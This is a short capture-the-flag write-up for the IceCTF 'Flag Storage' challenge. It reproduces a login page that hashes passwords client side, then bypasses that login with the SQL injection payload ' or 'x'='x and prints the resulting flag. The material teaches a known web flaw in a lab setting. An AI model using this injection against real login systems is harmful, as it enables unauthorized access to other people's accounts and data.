Recently Updated
Flag Storage
Challenge
What a cheat, I was promised a flag and I can’t even log in. Can you get in for me? flagstorage.vuln.icec.tf. They seem to hash their passwords, but I think the problem is somehow related to this.
Solution
We have to bypass the login system using SQL injections, page looks as follows:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
<!doctype html>
<html>
<head>
<meta charset="utf-8" />
<title>Log In</title>
<link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/skeleton/2.0.4/skeleton.min.css" />
</head>
<body>
<div class="container">
<form method="post" action="login.php" id="form">
<label for="username">Username: </label>
<input class="u-full-width" type="text" name="username" placeholder="Username" />
<label for="password">Password: </label>
<input id="password_plain" class="u-full-width" type="password" name="password_plain" placeholder="Password" />
<input id="password" type="hidden" name="password"/>
<input type="submit" value="Log In">
</form>
</div>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.1.0/jquery.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jsSHA/2.2.0/sha.js"></script>
<script>
$(function(){
var updatePassword = function(e){
// hash client side for better security, never leak the pw over the wire
var sha = new jsSHA("SHA-256", "TEXT");
sha.update($(this).val());
$("#password").val(sha.getHash("HEX"));
};
$("#password_plain").on("change", updatePassword);
$("#form").on("submit", updatePassword);
});
</script>
</body>
</html>
The password is hashed client side, so we just disable that script, and enter ' or 'x'='x for both username and password to log in and get our flag:
1
2
Logged in!
Your flag is: IceCTF{why_would_you_even_do_anything_client_side}
Flag
IceCTF{why_would_you_even_do_anything_client_side}